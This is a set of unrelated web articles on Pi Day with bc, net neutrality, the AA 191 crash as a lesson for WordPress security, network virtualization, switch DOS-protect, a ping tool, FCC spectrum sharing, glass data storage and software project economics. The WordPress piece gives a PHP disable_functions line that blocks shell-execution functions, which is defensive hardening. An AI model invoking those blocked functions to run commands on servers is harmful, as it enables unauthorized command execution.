It looks like I've missed Pi Day by some fraction of a day, but I can't help but get a little excited when this special day rolls around -- especially if pi turns into pie. And, while I can't remember much past 3.14159 in my head, I know that calculating pi to some outrageous number of digits can be pretty exciting and that we can do that fairly easily on Unix systems. Want to calculate pi to 1,000 digits? 314,159 digits? No problem. You can select just how many digits you want to see, plug that number into a calculation that I'm about to share, and ... voila! OK, depending on how many digits you've selected, there may be quite some time between your hitting the enter key and your shouting "Voila!". But let's take a look at what I should have explained yesterday. First, what is pi? I have a bit of a hard time remembering what I learned in junior high school math, but pi is the ratio between the circumference of a circle and its diameter. We celebrate Pi Day because the date (03/14) corresponds to the first three digits. Some people are even suggesting that yesterday was "rounded up Pi Day" because 03/14/16 is like 3.14159 rounded up to the 10,000ths place. There are several ways to calculate pi. Examples include: pi = 3 + 4/(2x3x4) - 4/(4x5x6) + 4/(6x7x8) ... pi = 4/1 - 4/3 + 4/5 - 4/7 + 4/9 - 4/11 + 4/13 ... The more you string this out, the more precise a value you'll get. But translating these calculations into Unix commands or using your calculator would undoubtedly be a pain -- and might even ruin the spirit of Pi Day for you. Instead, you can use a command called bc that you may or may not have run into in your many excursions into the wonders of Unix. The bc (basic calculator) command provides a high precision calculator on the command line. $ echo 11 + 7 | bc 18 $ echo 256 \* 256 | bc 65536 $ echo 921486914689 / 6 | bc 153581152448 Built into most Linux systems and complemented by a math library, bc can make quick work of calculating pi or, as I should say, quick work of entering the command. Ask for pi to 100 decimal places and it will run in a tiny fraction of a second. Ask for a million decimal places and you're going to have to wait a while. $ time echo "scale=100; 4*a(1)" | bc -l 3.141592653589793238462643383279502884197169399375105820974944592307\ 8164062862089986280348253421170676 real 0m0.003s user 0m0.000s sys 0m0.000s Each of these bc commands is first setting the number of decimal places we want to see (with the scale setting), calling in the bc math library (with the -l option), and providing the seed values for going after pi. What isn't immediately obvious is what a(1) has to do with calculating pi. The a in this calculation represents the inverse tangent or "arctangent" -- yet another way of computing pi. arctan(x) = x − x3/3 + x5/5 − x7/7 + x9/9 − x11/11 + ... For anyone who is mathematically inclined, it may be interesting that bc also includes a number of other useful functions. s(x): the sine of x in radians c(x): the cosine of x in radians a(x): the inverse tangent of x -- the result is returned in radians l(x): the natural logarithm of x e(x): the exponential function ex j(n,x): the Bessel function of order n of x You can also use bc for calculating square roots. $ echo 'sqrt(16)' | bc 4 $ echo 'sqrt(176)' | bc 13 $ echo 'scale=10; sqrt(176)' | bc 13.2664991614 I'm sorry that I didn't get this post up in time for the big day but, if you start now, you might have pi calculated to a billion digits by Pi Day of next year. 
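If you want to see just how slowly the 4/1 - 4/3 + 4/5 ... series above converges, bc can sum a chunk of it for you. This is purely illustrative: even 10,000 terms only get the first few decimal places right, which is why the arctangent trick is the one worth remembering. Note that the C-style for loop relies on GNU bc.
$ echo 'scale=10; s=0; for (i=0; i<10000; i++) { s = s + (-1)^i * 4/(2*i+1) }; s' | bc -l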
This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:2934d6f1-bbea-4f8a-af07-fc565c535215>
CC-MAIN-2017-09
http://www.computerworld.com/article/3044109/linux/a-postlude-on-pi-day.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00639-ip-10-171-10-108.ec2.internal.warc.gz
en
0.91487
976
3.015625
3
Net Neutrality is commonly misunderstood. However, it could easily affect our society for generations to come considering the widespread use of the Internet and the innovations that it fosters. This article will briefly explain what Net Neutrality is, why the FCC is involved and better solutions for solving the problem. The Internet has generally worked on a "First Come, First Serve" basis. Meaning, as information flows through the Internet, it is processed and forwarded in the order it was received. This gives every Internet user equal access to all applications and services on the Internet. For example, an Internet user may have a DSL Internet connection from AT&T and may use it to gain access to services from Vonage. Although Vonage is a competitor, AT&T's network treats their packets of information just the same as they would treat packets from their own services. The neutral Internet has provided opportunity for many innovative ideas and business models to grow and prosper. Equal access has allowed many of those ideas to begin with little or no funding. Facebook and Google are well-known examples. Facebook was started by Mark Zuckerberg when he was a college student at Harvard, and Google's first servers were in a friend's garage near Stanford. Why the FCC is Involved Some major Internet Service Providers (ISPs) have attempted to block or slow down traffic from web hosts the ISP did not want its customers to have access to. Recent examples include Comcast requiring Level3 (host for Netflix) to pay for faster access to its customers and Metro PCS blocking traffic from Vonage and Skype. These practices have alarmed customers, industry professionals and web-based service providers, especially when some ISPs have a monopoly or duopoly in certain areas that they serve. They may prevent customers from accessing desired services, stifle ideas and prevent new and innovative business models from having a chance for success. In an attempt to prevent these problems and keep the status quo of the Internet, the FCC passed a weak set of stipulations preventing land-based ISPs from unnecessarily blocking or slowing down content and an even weaker set of stipulations for wireless ISPs. These actions are being challenged in court and Congress. The long term effects of the actions are in doubt, especially with the government's poor track record of solving problems with rules and regulations. For the record, the FCC is not attempting to regulate the Internet. It is only attempting to limit ISPs from selectively blocking or slowing down access to legitimate web sites and services. Competition Solves the Problem The Net Neutrality debate exists because there is not enough competition in the broadband market. Corporations like Comcast and Verizon must maximize their profit and act in the best interest of their shareholders. Their list of priorities does not contain the idealistic goal of protecting an open Internet. This does not make them evil. It is just a fact. How can an open Internet be in sync with the responsibilities of Comcast and Verizon? That is simple. Competition. Christopher Yoo, director of the University of Pennsylvania Law School Center for Technology, Innovation and Competition, agrees. He is quoted in PCWorld as saying the net neutrality debate is less important than spurring broadband competition and implementing the FCC's national broadband plan, released last March.
The net neutrality debates in recent years “probably generated much more attention than they deserved.” If broadband competition was “robust enough, all these issues would go away.” Real time applications like Netflix, online gaming and VoIP (such as business Hosted PBX services) are rapidly becoming the most popular applications on the Internet. Could Verizon and Comcast block or slow down some of this content while going head-to-head against a competitor that does not? Not likely since losing revenue would not be maximizing their profit potential. And that would be far more effective than any regulation government could ever put in place.
<urn:uuid:959117e4-2e04-4a67-95d4-293ed0cb8770>
CC-MAIN-2017-09
http://www.hostmycalls.com/2011/01/27/broadband-competition-will-solve-net-neutrality-better-than-the-fcc/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00639-ip-10-171-10-108.ec2.internal.warc.gz
en
0.960206
788
3.671875
4
What Happened?
Before we can draw any wisdom from this tragedy, we must understand the dramatic mechanical failure that caused the engine to free itself from the wing. The McDonnell Douglas DC-10 wing engines are attached to a large arm called the "pylon", which is then attached to the wing (the original post includes a diagram of this arrangement). For various maintenance reasons, mechanics need to detach the engine and pylon from the wing. The procedure for doing this, as provided by McDonnell Douglas, calls for the removal of the engine first, followed by the removal of the pylon. However, this process is very time consuming, especially if you don't have a specific reason to detach the engine from the pylon. That's why several carriers, including American Airlines, independently developed procedures for detaching the pylon from the wing while the engine was still attached. AA's procedure involved using a fork lift to hold the engine and assembly while the pylon/wing bolts were removed and re-installed. McDonnell Douglas did not approve this procedure, and may have cautioned against it, but they could not dictate to any airline what procedures were used. As it turns out, it is very difficult to manipulate a heavy engine and pylon assembly using a fork lift with the precision required to avoid damaging the aircraft. In the case of the AA flight 191 aircraft, the rear pylon attachment point had been pressed up against the wing too hard, which created a fracture in the pylon's rear bracket. Over the next couple of months, this fracture widened with each take off and landing. When it finally failed, the engine's thrust pulled the entire assembly forward, rotating up and over the front edge of the wing. The engine/pylon took a chunk of the wing with it and cut the wing's hydraulic lines in the process. Inspection of other DC-10 planes after the crash revealed that similar damage had resulted from similar short-cut procedures used by both American and Continental Airlines. Clearly, the majority of responsibility for the flight 191 accident lies with the airline maintenance staff, since they didn't follow the recommended procedure. The aircraft engineers at McDonnell Douglas may very well have anticipated the potential problems with trying to detach the pylon from the wing with the engine still attached, which is why they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days. This caused huge problems for the company in a competitive aircraft market. It was little comfort to the victims and those affected by the crash. Everyone loses in these situations, even those who are "right" about a seemingly arcane technical issue.
Lessons about People and Process
If software security is about People, Process and Technology, as espoused by Schneier, then these kinds of issues seem to fall squarely in the People and Process categories. Especially when technical pitfalls are documented, it is easy for engineers that are knowledgeable in a particular area to develop ivory tower syndrome and take the stance: "I told you not to do it that way, but if you want to shoot yourself in the foot, by all means..." But if our goal is to provide end-to-end safety or security, then this mentality isn't acceptable.
As it turns out, there are things engineers can do, besides just documenting risks, to avoid People and Process problems with Technology. This is certainly not always the case: some problems simply cannot be addressed with Technology alone. But many can be mitigated if those problems can be anticipated to begin with. Typically in software, the downsides of failure are not nearly as serious. However, the kind of displaced fallout that McDonnell Douglas experienced also shows up in software security. One example would be with open source blog software packages, such as WordPress. In a number of discussions I've had with clients and security folk, the topic of WordPress security has come up. Everything I hear indicates that WordPress has a pretty poor reputation in this area. In one way, this seems a little odd to me, since I have briefly looked at the core WordPress code base a few times and they do a lot of things right. Sure, WordPress has its share of security issues, don't get me wrong, but the core software isn't that terrible. However, if you do a CVE search for WordPress, the number of vulnerabilities associated with WordPress plugins is quite depressing. To me, it is apparent that bad plugin security has hurt WordPress' reputation around security in general, despite the majority of vulnerabilities lying somewhat out of the core developers' control. There are two primary ways that engineers can help guide their technical customers (whether they be other programmers or maintenance crews) down a safe path: discourage dangerous usage and make safe usage much easier than the alternatives.
Discouraging Dangerous Usage
Let us return to the issue of mechanics trying to remove the engine and pylon assembly all in one piece. If the McDonnell Douglas engineers anticipated that this would be unsafe, then they could have made small changes to the engine/pylon assembly such that when the engine is attached, some of the mounting bolts between the pylon and wing were covered up. In this way, it becomes technically infeasible (short of getting out a hack saw) to carry on with the procedure that the airlines devised. In the case of WordPress, if the core developers realized that many plugin authors keep making mistakes using, say, an unsafe PHP function (there are soooo many to choose from...), then perhaps they could find a way to deploy a default PHP configuration that disables the unsafe functions by default (using the disable_functions option or equivalent). Sure, developers could override this, but it would give many developers pause as to why they have to take that extra step (and then perhaps more of them would actually RTFM).
Making Safe Usage Easier
Of course, disabling features or otherwise making life difficult for your customers is not the best way to make yourself popular. A better way to encourage safety by developers (or mechanics) would be to devise faster/better solutions to their problems that are also safe. In the case of the airline mechanics, once McDonnell Douglas realized that three airlines were using a short-cut procedure, then they could have evaluated the risks of this and devised another procedure that was both fast and safe. For instance, if they had tested United's method of using a hoist (rather than a fork lift), they may have realized that a hoist is perfectly fine and encouraged the other two airlines to use that method instead.
Or perhaps they could have provided a special protective guide, harness, or special jacks that would allow for fine control over the engine/pylon assembly when manipulating it. In the case of WordPress, instead of just disabling dangerous interfaces in PHP, they could also provide alternative interfaces that are much less likely to be misused. For example: database access APIs that don't require developers to write SQL statements by hand, or file access primitives that make directory traversal impossible within a certain sub-tree. Of course it depends on the kinds of mistakes that developers keep making, but by adding APIs that are both safe by default and that save developers time, more and more of the developer population will gravitate toward safe usage.
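For what it's worth, the disable_functions idea mentioned earlier fits in a single configuration line. The function list and file path below are illustrative assumptions on my part, not a recommendation from the WordPress or PHP projects — audit your own plugins before copying anything:
# hypothetical hardened stanza in the php.ini used by the blog's PHP pool
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
# check what the running interpreter actually has disabled
$ php -r 'var_dump(ini_get("disable_functions"));'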
<urn:uuid:33835174-49db-492e-9745-f4f9f9eb56af>
CC-MAIN-2017-09
http://blog.blindspotsecurity.com/2015_11_01_archive.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00583-ip-10-171-10-108.ec2.internal.warc.gz
en
0.966788
1,498
3.375
3
(Part I) Network Virtualization This is the first part in the series of posts dedicated to network virtualization and path isolation. Virtualization is a technique of simulating a hardware device by using software, usually on standard x86 CPU based servers. Hardware devices that are being virtualized are (in the order from most common) servers, firewalls, switches and routers. Almost all devices that you can think of can be virtualized, we listed the most common ones used within network operations. By using virtualization, we are able to run multiple virtual instances (virtual contexts) of a device, in the same way like we would run “real” hardware devices. Each of these virtualized instances is, of course, running independently and usually operating with separate configuration, enabling separation by purpose. Virtual instances are usually running as multiple contexts on specialised, virtualization enabled device or as Virtual Machines (VMs) on a Hypervisor platform like VMWare of Hyper-V. Network Virtualization is part of above explained virtualization. It is virtulization of networking devices. We are using network virtualization with VLANs on switches to enable multiple broadcast domains (LAN segments) to be connected on one single switch. We are doing the same thing on layer 3 with enabling the router to run multiple routing instances by implementing VRF configuration on it. With VRF we are splitting the router into multiple routers, with VLANs we are splitting switch into multiple switches. We are doing this with the use of software but only on specialized hardware devices that are virtualization enabled. There are two network elements we can virtualize Network virtualization can be as simple as running firewall on a VMWare host. In this case we are just skipping the usage of real hardware appliance for firewalling task. Things can get more complex with requirements for path isolation. Different categories of traffic then need to use same physical devices and their interconnections and have complete data communication isolation between them. Here we are in a situation where we will need to virtualize not only the above mentioned firewall but also router forwarding plane and interconnections between network devices. Ok that’s it! We can not only virtualize network devices but the paths between them to. Let’s see what that means. Enabling virtualization on a switch, we are logically splitting the device into two or more devices (that share same hardware) and deciding which switch port will be used by which instance. Popularly known as VLAN or Virtual LAN. By configuring multiple VRF (Virtual Routing and Forwarding) instances on a Router we are enabling our routing device to run multiple routing tables (separate RIB and FIB instances). Deciding which router port will forward traffic using one of the tables for decision making, we are actually running multiple routers on one hardware router. We split the router. Virtualization of the interconnections can be done as a single-hop virtualization. The best example here is the trunk link connecting two Ethernet switches. Using trunk link to interconnect the switches means usage of 802.1q VLAN tagging of all packets getting across from one switch to another. It further means that we can expand VLANs from one switch to another and use only one interconnection to do that. Without trunk, every VLAN that needs to be expanded to another switch would need a separate interconnection with access ports dedicated to that VLAN on both sides. 
Multi-hop interconnection virtualization can be done with GRE tunnel. In this case we can build a tunnel from one edge device, across the network of hundreds of nodes, to another edge device. They will logically seem to be directly connected across this GRE tunnel. GRE tunnel in this case is an isolated path for those two devices to use exclusively. When looking at hardware, the thing is.. Networking devices are forwarding traffic with specialized chipset (ASIC network processor) which cannot be simulated with software (at least not good enough). Virtualization is enabled by software but also uses advance hardware chipset capability to be accessed and controlled directly from virtual context. In this case, hardware chipset needs to be aware of how to work with virtualization layer to make this possible. This is why virtualization is not actually powered only by software but with combination of hardware and software. In server virtualization, the so-called hypervisor world, processor (CPU) have advanced virtualization technologies called Intel “VT-x” for Intel and “AMD-V” for AMD. They are enabling the Virtual Machines running on hypervisor to access CPU directly in some cases thus accelerating the Virtual Machine operation. In the networking world, related to hardware, we have so called DPDK firstly supported on Inter x86 processor. It is a driver, or driver set, which enables fast packet processing in CPU effectively enabling networking operation on standard server faster. Open vSwitch from Nicira/VMWare is doing something with smart algorithm and part with DPDK to get even better performance of packet switching from one interface to another using standard server processors. Standard server processors are in focus as they enable us to run networking devices without specialized hardware appliance from networking vendor. In this case we just install additional software on standard server making appliance out of it or deploying a Virtual Machine on a hypervisor which supports DPDK or some kind of acceleration for packet manipulation. In this way we get more flexibility, less power consumption and better overall resource usability with same or less in price. At this time, specialized networking appliances are still needed for high-end network devices which need cutting edge performance but more and more devices like firewalls and smaller datacenter routers are pushed into virtual environment. Read the whole series about Path Isolation techniques:
<urn:uuid:8c45ff52-3ed6-4db0-b274-f052208ea9ba>
CC-MAIN-2017-09
https://howdoesinternetwork.com/2016/network-virtualization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00635-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916377
1,186
3.375
3
If DOS-protect is enabled, the switch monitors the number of packets per second that are being forwarded by the CPU. Once the number of packets forwarded by the CPU reaches the configured Notify-threshold, it will log a message. This message does NOT indicate where the traffic originates from. Most traffic should NOT be forwarded by the CPU. Normally the CPU is only used to process control traffic such as ARP packets (e.g., ARP requests) and routing protocol control packets (e.g., OSPF hellos); management traffic such as telnet, SNMP, or SSH destined to the switch; and broadcast packets, some multicast packets and all unknown unicast packets. As long as the switch has an entry in its hardware tables for the destination (an entry such as an FDB entry, ARP entry, IGMP entry or a route), traffic will NOT be handled by the CPU. When a new entry is learned, the CPU will program the switch's hardware tables and CPU forwarding will stop. CPU forwarding is sometimes referred to as slowpath forwarding. In some cases CPU forwarding continues. This is an undesirable state and could be happening due to (among many other causes) an attack on the switch, a misconfigured device in the network or an intrusive network testing tool. DOS-protect can be configured on the switch to detect this misbehavior. Capturing the packets sent to the CPU with debug packet is the only way in this case to troubleshoot what is going to the CPU (see: How to perform a local packet capture on an EXOS switch). DOS-protect has two thresholds. What is discussed above is the Notify-threshold. The other threshold is the Alert-threshold. If the Alert-threshold is reached, DOS-protect will install an ACL to block the CPU-forwarded packets: it will try to find a match for most of the traffic and install the ACL accordingly. This is only done when DOS-protect is enabled (it is enabled by default). You can also enable DOS-protect in simulated mode; it will then only log which ACL it would have installed if DOS-protect were actually enabled, but will not install the ACL. This way you can get an idea of the traffic forwarded by the CPU and resolve it.
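The two-threshold behavior described above can be summarized with a rough sketch (illustrative Python pseudologic, not Extreme Networks code; the threshold values and data shapes are invented for the example):

```python
NOTIFY_THRESHOLD = 3500   # slowpath packets/sec that triggers a log message (example value)
ALERT_THRESHOLD = 4000    # slowpath packets/sec that triggers an ACL (example value)

def dos_protect_tick(cpu_pps, top_flow, simulated=False):
    """Evaluate one measurement interval of CPU-forwarded (slowpath) traffic.

    cpu_pps   -- packets per second currently being forwarded by the CPU
    top_flow  -- description of the flow making up most of that traffic,
                 e.g. {"src": "10.0.0.5", "dst": "10.0.0.1", "proto": "udp"}
    simulated -- if True, only report the ACL that would be installed
    """
    actions = []
    if cpu_pps >= NOTIFY_THRESHOLD:
        actions.append(f"LOG: CPU forwarding at {cpu_pps} pps exceeds notify-threshold")
    if cpu_pps >= ALERT_THRESHOLD:
        acl = f"deny {top_flow['proto']} {top_flow['src']} -> {top_flow['dst']}"
        if simulated:
            actions.append(f"LOG: would install ACL: {acl}")
        else:
            actions.append(f"INSTALL ACL: {acl}")
    return actions

print(dos_protect_tick(4200, {"src": "10.0.0.5", "dst": "10.0.0.1", "proto": "udp"}, simulated=True))
```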
<urn:uuid:7472a2aa-19b5-488d-a46d-ade62c67c9eb>
CC-MAIN-2017-09
https://gtacknowledge.extremenetworks.com/articles/Q_A/DOS-protect-log-message
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00511-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935537
470
2.84375
3
A ping test is used to determine the connectivity and latency of Internet-connected hosts. The online Ping Test uses the nping tool from the Nmap project. TTL in the Ping Response Here is a bit of useful information that you can impress your friends with... in a ping response there is a TTL, or Time to Live, value. These come from the system that you are sending your ICMP request packets to and can be used to perform a limited operating system detection check. The starting TTL varies depending on the operating system. Generally Linux, Windows and Cisco routers have differing values. Of course there are many other possible values and devices, however this can be a quick way to determine what the device is that is responding to your ping request. This can mean that gateway or NAT devices such as firewalls and routers may be the ones responding to the ping. For example, you could ping a Microsoft IIS web server, but if there is a firewall or load balancer in front of it with a *nix-based operating system, you will receive a TTL of 64 rather than the expected 128. Your actual result will be lower than the listed value as the TTL decrements on each hop along the path. Common Operating System TTL
- 64: Linux or other *nix-based operating systems
- 128: Microsoft Windows (from Windows XP onwards)
- 254: Cisco network routers
About the Test Ping Tool Ping is a network troubleshooting tool that displays the response time between two Internet (or IP) addresses. Ping tools are installed by default in most operating systems. It does not matter if you are using Solaris, Windows, FreeBSD or Ubuntu Linux; ping is ubiquitous. A ping uses a type of packet known as ICMP, commonly seen as an ICMP request and an ICMP reply. No response from Ping Firewalls and routers can be configured to block ICMP requests and responses, so you will sometimes find a system does not respond to ping even though the system is up and running. Network firewalls, such as commercial Cisco and Check Point products, can do this, as can local firewalls such as the Windows Firewall or a Linux firewall using iptables. What methods are used to determine the response? Ubuntu Linux Tool The default ping tool that comes with Ubuntu Linux is used, and the results are parsed and displayed in the table. Number of ICMP Packets Five packets are sent from our server in Newark (USA), and our system will then determine how long it takes to get a response from your selected target IP address. Is this dangerous? Ping is a very common tool that is used everywhere, and there is nothing dangerous about an ICMP packet, so you are free to try and ping different systems to determine if they are running and how far away they are from our system. Note that it is possible to use ICMP for a denial of service attack; however, this requires sending many more packets than the five that the tool here does. Need even faster access to the online Ping tool than the form above? Try our easy-to-use API; you are limited to a simple 50 lookups a day and there is no API key required. It is pretty straightforward: use a web client of some kind such as curl, Firefox, Python or PHP and hit that address, and you will see the ping results as a simple text response to your HTTP query. Of course, change the 8.8.8.8 (the Google public DNS server) to an IP or hostname of your choosing.
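As a rough illustration of the TTL-based guessing described above (a sketch, not part of the online service; it assumes a Linux-style ping with the -c flag, and the TTL-to-OS mapping is only a heuristic), you could run the system ping and inspect the reply TTL like this:

```python
import re
import subprocess

def ping_ttl(host, count=5):
    """Run the system ping (Linux-style flags) and return the TTL seen in replies, or None."""
    out = subprocess.run(["ping", "-c", str(count), host],
                         capture_output=True, text=True).stdout
    match = re.search(r"ttl=(\d+)", out, re.IGNORECASE)
    return int(match.group(1)) if match else None

def guess_os(ttl):
    """Heuristic only: the reply TTL is the sender's initial TTL minus the hop count."""
    if ttl is None:
        return "no reply (possibly filtered by a firewall)"
    if ttl <= 64:
        return "likely Linux/*nix (initial TTL 64)"
    if ttl <= 128:
        return "likely Windows (initial TTL 128)"
    return "likely a Cisco router or similar (initial TTL 254/255)"

ttl = ping_ttl("8.8.8.8")
print(ttl, guess_os(ttl))
```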
<urn:uuid:760fb615-f3fe-4f72-bb8e-91433157494a>
CC-MAIN-2017-09
https://hackertarget.com/test-ping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00103-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927089
722
3.09375
3
The U.S. military might have to share its radar frequencies with mobile broadband providers under a plan the Federal Communications Commission continued to flesh out this week under the catchy name Citizens Broadband Radio Service. CBRS isn't exactly a broadband version of Citizens Band radio -- which still exists, at astonishingly low frequencies around 27MHz -- but the FCC's description of what it might be used for suggests a broad range of options. They include licensed carrier cells, fixed wireless broadband, advanced home networking and other uses, the agency said. It's seeking public comment on the proposals. The proposed rules could allow sharing a wide band of spectrum spanning 3550MHz to 3700MHz. Parts of that spectrum are home to high-powered military radar, especially within 200 miles of U.S. coastlines, which is also home to a majority of the country's population. To prevent interference, the FCC calls for using a dynamic database to keep track of where and when the frequencies can be used. Network equipment can tap into such databases to find out whether a certain frequency is being used in a given area. Though the concept of spectrum sharing with a database is similar to the so-called "white spaces" that are open to unlicensed use around TV channels, the CBRS band would be a bit different. It would have three classes of users. Federal and non-federal incumbent users would be first, protected from interference from the new services. Next would be "targeted priority access," including licensees offering mobile broadband. Finally, "general authorized access" users would be permitted "in a reserved amount of spectrum and on an opportunistic basis," the agency said. That could include both consumer and business uses. Mobile operators and some lawmakers have opposed spectrum sharing, saying exclusive, commercial spectrum licenses better serve consumers. But the President's Council of Advisors on Science and Technology recommended in 2012 that the government find ways to share as much as 1.5GHz of spectrum. It identified the 3.5GHz band as the best target for early sharing. The 3.5GHz band is higher than the frequencies typically used for mobile broadband, making it better suited to so-called small cells, miniature base stations designed to serve tightly packed urban users over short distances. Technology advances in small cells and in spectrum-sharing systems will help to make CBRS feasible, the FCC said.
<urn:uuid:b35b0024-2033-4dea-af34-68d81c191210>
CC-MAIN-2017-09
http://www.networkworld.com/article/2176385/smb/us-wireless-users-may-get-to-share-military-spectrum.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00451-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948302
508
2.5625
3
Researchers have been able to demonstrate the ability to read and write data using a five-dimensional recording process in a synthetic crystal to store massive amounts of data indefinitely. The researchers, led by Jingyu Zhang from the University of Southampton in the U.K., successfully recorded a 300KB digital copy of a text file onto nanostructured glass in 5D using an ultrafast, intense pulsed laser. The file was written in three layers of nanostructured dots separated by five micrometers (five millionths of a meter). The scientists used a femtosecond laser, which emits pulses of light in femtoseconds (one quadrillionth, or one millionth of one billionth of a second). The 5D read/write laser can record an estimated 360TB per disc on nanostructured glass with thermal stability up to 1,000°C -- and a practically unlimited lifetime. In a statement this week, the researchers called the glass the "Superman memory crystal," alluding to the "memory crystals" used in Superman films to store the planet Krypton's history and its civilization's collective knowledge. The University of Southampton researchers recorded the data via self-assembled nanostructures created in fused quartz, which they said are able to store the vast quantities of data for more than a million years. The information is encoded in five dimensions: the size and orientation of these nanostructures in addition to their three-dimensional position. According to a recently published paper, the self-assembled nanostructures change the way light travels through glass, modifying the polarization of light, which can then be read by a combination of optical microscope and polarizer, similar to that found in Polaroid sunglasses. A graphic depicting a 5D optical storage writing setup: femtosecond laser, spatial light modulator (SLM), Fourier lens (FL), half-wave plate matrix (λ/2 M), dichroic mirror, 1.2 NA water immersion objective, silica glass sample, translation stage. (Image: University of Southampton) The research was conducted as part of a joint project with Eindhoven University of Technology. "We are developing a very stable and safe form of portable memory using glass, which could be highly useful for organizations with big archives," Jingyu said in a statement. "At the moment, companies have to back up their archives every five to 10 years because hard-drive memory has a relatively short lifespan. "Museums who want to preserve information or places like the national archives where they have huge numbers of documents, would really benefit," he added. This article, 'Superman' crystals could store 360TB of data forever, was originally published at Computerworld.com. Lucas Mearian covers storage, disaster recovery and business continuity, financial services infrastructure and health care IT for Computerworld. Follow Lucas on Twitter at @lucasmearian or subscribe to Lucas's RSS feed. His e-mail address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
<urn:uuid:3a07719f-8a96-41f7-917b-34fd4f20565b>
CC-MAIN-2017-09
http://www.computerworld.com.au/article/520788/_superman_crystals_could_store_360tb_data_forever/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.924184
640
3.125
3
This article uses economic criteria to define what it means for a project to fail. It then categorizes how projects fail and, finally, examines common traps that contribute to or accelerate project failure. The cost, feature, product spiral Economics of Adding Features Organizations must consider the cost of adding features to a product. Figure 1 shows a software project whose returns outpace the cost of production, thus producing a positive ROI. Figure 2 depicts a product that initially has a positive ROI, but whose added features cost (marginal cost) more than the amount of return generated by the features. This initially profitable product becomes a drag on the company. Figures 1 and 2 are deceptive because under most software processes, the cost of changing software is not linear, but exponential. Brooks (1) attributes the exponential rise in costs to the cost of communication. Changes to software include new features, bug fixes and scaling. The effects of an exponential cost of production can be characterized by three properties. First, new projects are successful because the cost curve is flat. Second, once the costs start increasing, they quickly overcome any additional value added from the new features. Finally, if changes are made after the costs become exponential, the additional costs will quickly overwhelm all returns garnered from the product to date. Figure 3 details the effects of an exponential cost of change. Software processes are designed to manage the cost of change. An examination of cost management and processes is beyond the scope of this article but will be the topic of a future article. Briefly, processes that follow waterfall and iterative models control costs by reducing the need for change as costs increase. In contrast, processes based on the spiral model ensure that the cost of change is fixed. This article assumes an exponential cost of change, as most projects are based on waterfall or iterative models. Changes are often unavoidable because there are no successful medium-sized software projects. Successful projects require a significant amount of development and become a company asset. Maximizing ROI means expanding the market and adding features, which, in turn, increases the investment in the product. If the next version is successful, this increased investment leads to an even greater desire to maximize returns. If the cost of change becomes exponential, high cost makes adding features impractical and development must stop. Unfortunately, most companies do not realize this point exists and spend huge sums on dead products. Software Failure Modes Exponential costs of change belie a stark reality: Unless the product is shipped before the cost of change becomes exponential, it will very likely fail. Many projects become races to see if enough features can be created to make a viable product before adding the additional required features becomes too expensive. There are four failure modes that prevent product completion: Hitting the wall before release: A small team of programmers is making good progress adding features to a product. Before the needed features can be delivered, some event makes the cost of change exponential and all progress stops. These events may include losing a key team member, adding team members to accelerate production, unforeseen difficulties with technology choices, unforeseen requirements, and major changes in the target audience or market. Figure 4 shows how the minimum number of features will never be reached.
90% done: A team of programmers is making steady progress but never finishes the required features because of a gradual rise in the cost of change. This failure mode is often unavoidable because the riskiest features are often put off until last. These features often involve so much complexity that their solutions overwhelm the development process. Proper risk mitigation is essential to avoiding this failure mode. Endless QA: Endless QA occurs when a product ships with all features completed, but still has too many bugs to make it into production. If the cost curve has become exponential, these bugs will take longer and longer to fix. As the cost of change increases, any given change will likely cause more bugs. Figure 6 demonstrates how the fixing of bugs once the product is released to QA can ruin ROI. The higher the cost of change before delivery to QA, the larger the number of bugs. Indeed, the number of bugs at QA is a good indirect metric of the cost of change. Version 2.0: Most failures of version 2.0 of any product can be traced to an exponential cost of change. During version 1.x, the cost of change has become exponential. The new features will never generate high-enough returns to make up for the costs of producing the version. Figure 7 diagrams this effect. What is most frustrating for many teams is that after a successful first version, the costs of change may have become so high that it is unlikely the second version will ever ship. If costs do increase exponentially, development teams must ensure cost is managed until delivery of the product. If they don't, failure is all but guaranteed. Unfortunately, there are several traps for developers that accelerate the onset of exponential costs of change. Interestingly, all of these techniques are designed to accelerate development at the beginning of the project, but the costs of using them may overwhelm any savings. Here are five of the most common traps: Prototype trap. Product prototypes are great ways to prove technologies and techniques and reduce risk. However, unless the economics of development are understood, they become liabilities. The problem is how much money is spent on the prototype. If enough resources are spent on any given prototype, it becomes too valuable to throw away. Most developers intend to throw away a prototype once it is completed, but the resulting code quickly becomes expensive to change. The prototype trap can be avoided by ensuring that no significant investment is spent on any given prototype. There are many situations where prototypes are necessary, but they must never endanger a project by reducing the amount of resources available to finish. 4GL trap. 4GLs such as Visual Basic (VB), Forte 4GL, and Magic allow developers to rapidly develop applications by making assumptions about how data will be accessed and displayed. The problem with 4GLs is that the code is very hard to modify after it has been created. This accelerates the cost of change. In addition, a language that makes some applications easy to create becomes a hindrance when the problem domain exceeds the design of that language. Often, the only way around these limitations is to use some other language such as Java or C++ to solve the unsupported problem. The interfaces between multiple languages are notoriously expensive to maintain and extend. Anyone who has tried to make a VB application perform and look like a professional, highly polished standalone application will immediately realize these limitations.
